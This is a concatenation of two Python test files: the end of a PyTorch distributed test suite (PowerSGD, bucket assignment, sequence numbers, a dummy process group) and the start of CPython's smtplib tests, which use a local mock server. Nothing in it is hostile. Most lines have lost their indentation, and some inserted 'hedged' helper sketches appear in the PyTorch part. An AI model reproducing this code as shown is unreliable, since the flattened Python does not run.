"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
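# Hedged counterpart to the test above (illustration only): a configuration
# that satisfies the constraint being tested -- `start_powerSGD_iter` must
# exceed 1 whenever error feedback or warm start is enabled.
def _example_valid_powerSGD_state():
    return powerSGD.PowerSGDState(
        process_group=None,
        matrix_approximation_rank=1,
        start_powerSGD_iter=2,  # > 1, so error feedback and warm start are legal
        use_error_feedback=True,
        warm_start=True,
    )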
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
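# Hedged pure-Python sketch of the greedy behavior the tests above expect
# from `_compute_bucket_assignment_by_size` (an assumption drawn from the
# assertions, not from the C++ implementation): tensors are first partitioned
# by dtype, then each partition is filled bucket-by-bucket, moving to the next
# size limit after a bucket closes (the last limit is reused thereafter).
def _greedy_buckets(sizes_bytes, limits):
    buckets, current, used, limit_idx = [], [], 0, 0
    for i, size in enumerate(sizes_bytes):
        limit = limits[min(limit_idx, len(limits) - 1)]
        if current and used + size > limit:
            buckets.append(current)
            current, used = [], 0
            limit_idx += 1
        current.append(i)
        used += size
    if current:
        buckets.append(current)
    return buckets
# E.g. _greedy_buckets([40, 40, 40, 40], [40, 80]) == [[0], [1, 2], [3]],
# matching test_multi_limit_single_dtype above.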
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
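# Hedged illustration (an assumption based on the comments above): gathering
# through the *same* group would advance the sequence number being checked,
# which is why a separate `verify_pg` is used throughout these tests.
def _seq_num_self_increment_demo(pg):
    before = pg._get_sequence_number_for_group()
    obj_list = [None for _ in range(dist.get_world_size(pg))]
    dist.all_gather_object(obj_list, before, group=pg)  # itself a collective
    return before, pg._get_sequence_number_for_group()  # expect (n, n + 1)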
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
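# Hedged usage sketch (not part of the test): the debug level is read from
# the TORCH_DISTRIBUTED_DEBUG environment variable at query time, so it must
# be set beforehand.
def _enable_detail_debug_mode():
    os.environ["TORCH_DISTRIBUTED_DEBUG"] = "DETAIL"
    # Expected to return dist._DistributedDebugLevel.DETAIL.
    return dist._get_debug_mode()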
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
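# Hedged single-process sketch (mirrors the expectations in the tests below):
# the dummy backend applies fixed arithmetic instead of real communication,
# so collective results are fully predictable.
def _dummy_pg_demo():
    pg = DummyProcessGroup(0, 1)  # rank 0, world size 1
    t = torch.zeros(2, 2)
    pg.allreduce([t]).wait()   # adds 2 in place
    pg.broadcast([t]).wait()   # adds 1 in place
    return t                   # a tensor of threes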
class PythonProcessGroupTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.destroy_process_group()
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly call that.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST, HOSTv4, HOSTv6
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Server loop for the test server thread; drives the given SMTP server via
# asyncore until the client signals completion
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testEHLO(self):
# EHLO is implemented in DebuggingServer; check the advertised extensions
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# The Sender header overrides From as the envelope sender
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Bcc and Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
